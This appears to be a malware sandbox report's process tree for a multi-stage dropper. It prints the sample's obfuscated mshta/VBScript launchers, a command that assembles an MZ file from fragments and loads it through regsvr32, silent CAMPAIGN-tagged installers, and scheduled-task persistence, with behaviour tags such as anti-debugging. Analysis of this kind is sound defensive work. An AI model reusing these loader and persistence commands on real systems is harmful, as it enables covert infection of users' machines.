C:\ProgramData\1907429.exe"C:\ProgramData\1907429.exe"2⤵
- Executes dropped EXE
-
C:\ProgramData\6722478.exe"C:\ProgramData\6722478.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\3782043.exe"C:\ProgramData\3782043.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\4844256.exe"C:\ProgramData\4844256.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\263405.exe"C:\ProgramData\263405.exe"2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT( "WSCRiPT.SHelL" ). RuN("C:\Windows\system32\cmd.exe /R copY /Y ""C:\ProgramData\263405.exe"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If """" == """" for %T IN (""C:\ProgramData\263405.exe"" ) do taskkill -iM ""%~nxT"" -f" , 0,trUe ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R copY /Y "C:\ProgramData\263405.exe" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq &If "" =="" for %T IN ("C:\ProgramData\263405.exe") do taskkill -iM "%~nxT" -f4⤵
-
C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT( "WSCRiPT.SHelL" ). RuN("C:\Windows\system32\cmd.exe /R copY /Y ""C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If ""/PrWIGG7qbcjwuF1awT~BmZfq "" == """" for %T IN (""C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE"" ) do taskkill -iM ""%~nxT"" -f" , 0,trUe ) )6⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R copY /Y "C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq &If "/PrWIGG7qbcjwuF1awT~BmZfq " =="" for %T IN ("C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE") do taskkill -iM "%~nxT" -f7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRIPt: cLoSE ( cReatEOBJECT( "wscRIPt.shell" ). rUn ("CMd /c ecHO | SeT /P = ""MZ"" >STBAQR.mZ &CoPy /b /y StbAQR.mZ +NNIZo8.S+ _7Ijs.BLD + GX3VA2JI.W+ JGSZHKM.HL + XD16P.N ..\WaVZQ~GT.C & StArT regsvr32 /s ..\WAvZq~GT.C /u &del /Q *" ,0 ,tRUE))6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ecHO | SeT /P = "MZ" >STBAQR.mZ &CoPy /b /y StbAQR.mZ +NNIZo8.S+ _7Ijs.BLD + GX3VA2JI.W+ JGSZHKM.HL +XD16P.N ..\WaVZQ~GT.C & StArT regsvr32 /s ..\WAvZq~GT.C /u &del /Q *7⤵
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>STBAQR.mZ"8⤵
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHO "8⤵
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s ..\WAvZq~GT.C /u8⤵
- Loads dropped DLL
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "263405.exe" -f5⤵
- Kills process with taskkill
C:\ProgramData\4990988.exe"C:\ProgramData\4990988.exe"2⤵
- Executes dropped EXE
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun038db98f99bf9a.exeSun038db98f99bf9a.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
C:\Users\Admin\Pictures\Adobe Films\qQbVMM4g0bpXElDCk7u81Gef.exe"C:\Users\Admin\Pictures\Adobe Films\qQbVMM4g0bpXElDCk7u81Gef.exe"2⤵
- Executes dropped EXE
C:\Users\Admin\Pictures\Adobe Films\mXtIGk3ofwNa4d7r1RCLpLFz.exe"C:\Users\Admin\Pictures\Adobe Films\mXtIGk3ofwNa4d7r1RCLpLFz.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
C:\Users\Admin\Documents\RIIYmTjLPmSKrYWy3rHDnAMz.exe"C:\Users\Admin\Documents\RIIYmTjLPmSKrYWy3rHDnAMz.exe"3⤵
C:\Users\Admin\Pictures\Adobe Films\B2zEVweKaLRoMVSBnxG2zIKP.exe"C:\Users\Admin\Pictures\Adobe Films\B2zEVweKaLRoMVSBnxG2zIKP.exe"4⤵
- Executes dropped EXE
C:\Users\Admin\Pictures\Adobe Films\1asWT9_23sWIkWvXBfuAHztv.exe"C:\Users\Admin\Pictures\Adobe Films\1asWT9_23sWIkWvXBfuAHztv.exe"4⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 2365⤵
- Program crash
C:\Users\Admin\Pictures\Adobe Films\Q1pBmzxBvVLfgY90IfmvNLJJ.exe"C:\Users\Admin\Pictures\Adobe Films\Q1pBmzxBvVLfgY90IfmvNLJJ.exe"4⤵
C:\Users\Admin\Pictures\Adobe Films\2CBMfkvtUogf9hzCi_qA7oap.exe"C:\Users\Admin\Pictures\Adobe Films\2CBMfkvtUogf9hzCi_qA7oap.exe"4⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7548 -s 2805⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
C:\Users\Admin\Pictures\Adobe Films\Qa0ydjRf2tdAW_WXEvJN1dhr.exe"C:\Users\Admin\Pictures\Adobe Films\Qa0ydjRf2tdAW_WXEvJN1dhr.exe"4⤵
C:\Users\Admin\AppData\Local\Temp\is-F4COS.tmp\Qa0ydjRf2tdAW_WXEvJN1dhr.tmp"C:\Users\Admin\AppData\Local\Temp\is-F4COS.tmp\Qa0ydjRf2tdAW_WXEvJN1dhr.tmp" /SL5="$10408,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Qa0ydjRf2tdAW_WXEvJN1dhr.exe"5⤵
- Loads dropped DLL
C:\Users\Admin\AppData\Local\Temp\is-EF1H5.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-EF1H5.tmp\ShareFolder.exe" /S /UID=27096⤵
- Drops file in Drivers directory
C:\Users\Admin\AppData\Local\Temp\20-856f3-888-eca8c-b90f044df7422\SHeviwihyqa.exe"C:\Users\Admin\AppData\Local\Temp\20-856f3-888-eca8c-b90f044df7422\SHeviwihyqa.exe"7⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\to1bqwhx.2on\GcleanerEU.exe /eufive & exit8⤵
C:\Users\Admin\AppData\Local\Temp\to1bqwhx.2on\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\to1bqwhx.2on\GcleanerEU.exe /eufive9⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 30840 -s 24010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\42vghfch.xrq\any.exe & exit8⤵
C:\Users\Admin\AppData\Local\Temp\42vghfch.xrq\any.exeC:\Users\Admin\AppData\Local\Temp\42vghfch.xrq\any.exe9⤵
C:\Users\Admin\AppData\Local\Temp\42vghfch.xrq\any.exe"C:\Users\Admin\AppData\Local\Temp\42vghfch.xrq\any.exe" -u10⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cd1awdw5.d1g\installer.exe /qn CAMPAIGN="654" & exit8⤵
C:\Users\Admin\AppData\Local\Temp\cd1awdw5.d1g\installer.exeC:\Users\Admin\AppData\Local\Temp\cd1awdw5.d1g\installer.exe /qn CAMPAIGN="654"9⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rkgc0cx2.5qx\gcleaner.exe /mixfive & exit8⤵
C:\Users\Admin\AppData\Local\Temp\rkgc0cx2.5qx\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\rkgc0cx2.5qx\gcleaner.exe /mixfive9⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 31180 -s 24010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n4tcryki.du0\autosubplayer.exe /S & exit8⤵
- Suspicious use of SetWindowsHookEx
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xfdoigal.rak\GcleanerEU.exe /eufive & exit8⤵
C:\Users\Admin\AppData\Local\Temp\xfdoigal.rak\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\xfdoigal.rak\GcleanerEU.exe /eufive9⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 23610⤵
- Program crash
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f150pmua.u2w\installer.exe /qn CAMPAIGN="654" & exit8⤵
C:\Users\Admin\AppData\Local\Temp\f150pmua.u2w\installer.exeC:\Users\Admin\AppData\Local\Temp\f150pmua.u2w\installer.exe /qn CAMPAIGN="654"9⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pboj5jlr.n3t\any.exe & exit8⤵
C:\Users\Admin\AppData\Local\Temp\pboj5jlr.n3t\any.exeC:\Users\Admin\AppData\Local\Temp\pboj5jlr.n3t\any.exe9⤵
C:\Users\Admin\AppData\Local\Temp\pboj5jlr.n3t\any.exe"C:\Users\Admin\AppData\Local\Temp\pboj5jlr.n3t\any.exe" -u10⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\45lyntr3.ree\gcleaner.exe /mixfive & exit8⤵
C:\Users\Admin\AppData\Local\Temp\45lyntr3.ree\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\45lyntr3.ree\gcleaner.exe /mixfive9⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8664 -s 23610⤵
- Program crash
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mqtobfb1.to5\autosubplayer.exe /S & exit8⤵
C:\Users\Admin\Pictures\Adobe Films\mSbGRGi7Yiq04OsOdmXbOJGl.exe"C:\Users\Admin\Pictures\Adobe Films\mSbGRGi7Yiq04OsOdmXbOJGl.exe"4⤵
C:\Users\Admin\AppData\Local\Temp\is-GI393.tmp\mSbGRGi7Yiq04OsOdmXbOJGl.tmp"C:\Users\Admin\AppData\Local\Temp\is-GI393.tmp\mSbGRGi7Yiq04OsOdmXbOJGl.tmp" /SL5="$702D6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\mSbGRGi7Yiq04OsOdmXbOJGl.exe"5⤵
- Loads dropped DLL
C:\Users\Admin\AppData\Local\Temp\is-AC606.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-AC606.tmp\ShareFolder.exe" /S /UID=27106⤵
- Drops file in Drivers directory
C:\Users\Admin\AppData\Local\Temp\52-5cd71-928-ef2ba-3df7538a39203\Xushafufubo.exe"C:\Users\Admin\AppData\Local\Temp\52-5cd71-928-ef2ba-3df7538a39203\Xushafufubo.exe"7⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pmxmkkld.uci\GcleanerEU.exe /eufive & exit8⤵
C:\Users\Admin\AppData\Local\Temp\pmxmkkld.uci\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\pmxmkkld.uci\GcleanerEU.exe /eufive9⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 23610⤵
- Program crash
- Enumerates system info in registry
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k4igwvkd.ivi\installer.exe /qn CAMPAIGN="654" & exit8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Users\Admin\AppData\Local\Temp\k4igwvkd.ivi\installer.exeC:\Users\Admin\AppData\Local\Temp\k4igwvkd.ivi\installer.exe /qn CAMPAIGN="654"9⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nba1apdi.pkw\any.exe & exit8⤵
C:\Users\Admin\AppData\Local\Temp\nba1apdi.pkw\any.exeC:\Users\Admin\AppData\Local\Temp\nba1apdi.pkw\any.exe9⤵
C:\Users\Admin\AppData\Local\Temp\nba1apdi.pkw\any.exe"C:\Users\Admin\AppData\Local\Temp\nba1apdi.pkw\any.exe" -u10⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wujdkzya.xge\gcleaner.exe /mixfive & exit8⤵
C:\Users\Admin\AppData\Local\Temp\wujdkzya.xge\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\wujdkzya.xge\gcleaner.exe /mixfive9⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9416 -s 23610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ov0r321b.lqk\autosubplayer.exe /S & exit8⤵
- Suspicious use of SetWindowsHookEx
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kc3jbdie.qhn\GcleanerEU.exe /eufive & exit8⤵
C:\Users\Admin\AppData\Local\Temp\kc3jbdie.qhn\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kc3jbdie.qhn\GcleanerEU.exe /eufive9⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10628 -s 24010⤵
- Program crash
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ozngvw3u.mxm\installer.exe /qn CAMPAIGN="654" & exit8⤵
C:\Users\Admin\AppData\Local\Temp\ozngvw3u.mxm\installer.exeC:\Users\Admin\AppData\Local\Temp\ozngvw3u.mxm\installer.exe /qn CAMPAIGN="654"9⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bcn30dsf.o1s\any.exe & exit8⤵
C:\Users\Admin\AppData\Local\Temp\bcn30dsf.o1s\any.exeC:\Users\Admin\AppData\Local\Temp\bcn30dsf.o1s\any.exe9⤵
C:\Users\Admin\AppData\Local\Temp\bcn30dsf.o1s\any.exe"C:\Users\Admin\AppData\Local\Temp\bcn30dsf.o1s\any.exe" -u10⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xleyqqxz.u01\gcleaner.exe /mixfive & exit8⤵
C:\Users\Admin\AppData\Local\Temp\xleyqqxz.u01\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\xleyqqxz.u01\gcleaner.exe /mixfive9⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 32448 -s 23610⤵
- Program crash
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zczlk0uz.byc\autosubplayer.exe /S & exit8⤵
C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe"C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe"4⤵
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe" ) do taskkill -f -iM "%~NxM"6⤵
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "Ry0sLelmoRd_bMBgDPnNMTnO.exe"7⤵
- Kills process with taskkill
C:\Users\Admin\Pictures\Adobe Films\CmeSFYMVAV502OOB00xIE3du.exe"C:\Users\Admin\Pictures\Adobe Films\CmeSFYMVAV502OOB00xIE3du.exe"4⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7392 -s 17405⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
C:\Users\Admin\Pictures\Adobe Films\atsjEP9tHtbUr6Sjxuvtr01j.exe"C:\Users\Admin\Pictures\Adobe Films\atsjEP9tHtbUr6Sjxuvtr01j.exe"4⤵
C:\Users\Admin\Pictures\Adobe Films\atsjEP9tHtbUr6Sjxuvtr01j.exe"C:\Users\Admin\Pictures\Adobe Films\atsjEP9tHtbUr6Sjxuvtr01j.exe" -u5⤵
C:\Users\Admin\Pictures\Adobe Films\s8SU1s3eNIwgJA57Ks5cMfdE.exe"C:\Users\Admin\Pictures\Adobe Films\s8SU1s3eNIwgJA57Ks5cMfdE.exe"4⤵
- Loads dropped DLL
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Loads dropped DLL
- Adds Run key to start application
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"6⤵
- Suspicious use of FindShellTrayWindow
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff8edc9dec0,0x7ff8edc9ded0,0x7ff8edc9dee07⤵
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1592 /prefetch:27⤵
- Modifies registry class
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=1900 /prefetch:87⤵
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2480 /prefetch:17⤵
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2468 /prefetch:17⤵
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=2376 /prefetch:87⤵
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=3060 /prefetch:87⤵
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3312 /prefetch:27⤵
- Modifies registry class
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=3516 /prefetch:87⤵
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=3888 /prefetch:87⤵
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=3880 /prefetch:87⤵
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=3912 /prefetch:87⤵
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
C:\Users\Admin\Pictures\Adobe Films\EBU0gvgBJleOPWdQsXtPukc0.exe"C:\Users\Admin\Pictures\Adobe Films\EBU0gvgBJleOPWdQsXtPukc0.exe"2⤵
- Executes dropped EXE
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5684 -s 2363⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
C:\Users\Admin\Pictures\Adobe Films\FvMCEwri6_qByE_3M8DbslRU.exe"C:\Users\Admin\Pictures\Adobe Films\FvMCEwri6_qByE_3M8DbslRU.exe"2⤵
- Executes dropped EXE
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
C:\Users\Admin\Pictures\Adobe Films\S7koKpK33vLWjAxi5chFkuJ9.exe"C:\Users\Admin\Pictures\Adobe Films\S7koKpK33vLWjAxi5chFkuJ9.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
C:\Users\Admin\Pictures\Adobe Films\aAXlLwdC9UKnsWc8aTXy3Ptd.exe"C:\Users\Admin\Pictures\Adobe Films\aAXlLwdC9UKnsWc8aTXy3Ptd.exe"2⤵
- Executes dropped EXE
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5872 -s 2403⤵
- Program crash
- Enumerates system info in registry
C:\Users\Admin\Pictures\Adobe Films\nxfL7_6XSgUfDUVDEan06Mbe.exe"C:\Users\Admin\Pictures\Adobe Films\nxfL7_6XSgUfDUVDEan06Mbe.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0397381f1f458e.exeSun0397381f1f458e.exe1⤵
- Executes dropped EXE
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0397381f1f458e.exe"C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0397381f1f458e.exe" -u2⤵
- Executes dropped EXE
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03e4aeb7e43a1c.exeSun03e4aeb7e43a1c.exe1⤵
- Executes dropped EXE
